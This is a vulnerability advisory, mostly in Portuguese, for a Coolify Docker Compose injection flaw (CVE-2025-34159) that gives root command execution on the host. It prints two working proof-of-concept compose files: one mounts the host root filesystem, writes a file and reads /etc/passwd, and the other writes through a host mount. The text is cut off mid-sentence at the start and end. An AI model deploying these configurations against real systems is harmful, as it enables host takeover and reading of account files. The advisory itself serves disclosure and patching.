
A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on
| Campo | Valor |
|---|---|
| ID do CVE | CVE-2025-34159 |
| Afeta | Coolify ≤ v4.0.0-beta.420.6 |
| Corrigido em | v4.0.0-beta.420.7 |
| Gravidade | Crítica |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (Injeção de Comandos do SO), CWE-20 (Validação de Entrada Incorreta) |
Uma vulnerabilidade crítica de Execução Remota de Código (RCE) existe no fluxo de implantação de aplicações do Coolify. Esta falha permite que um membro com privilégios baixos injete diretivas arbitrárias do Docker Compose durante a criação ou atualização de projetos. Ao definir um serviço malicioso que monta o sistema de arquivos do host, um atacante pode alcançar execução de comandos a nível de root no sistema operacional do host, contornando completamente o isolamento do contêiner.
A vulnerabilidade existe no fluxo de implantação de projetos, onde as configurações de Docker Compose fornecidas pelo utilizador são processadas sem validação ou isolamento suficientes.
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /host/etc/passwd
"
Resultado: Após a implantação, /tmp/proof_rce.txt aparece no sistema host, confirmando RCE com privilégios de root.
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt) ou revendo a saída de comandos nos logs de implantação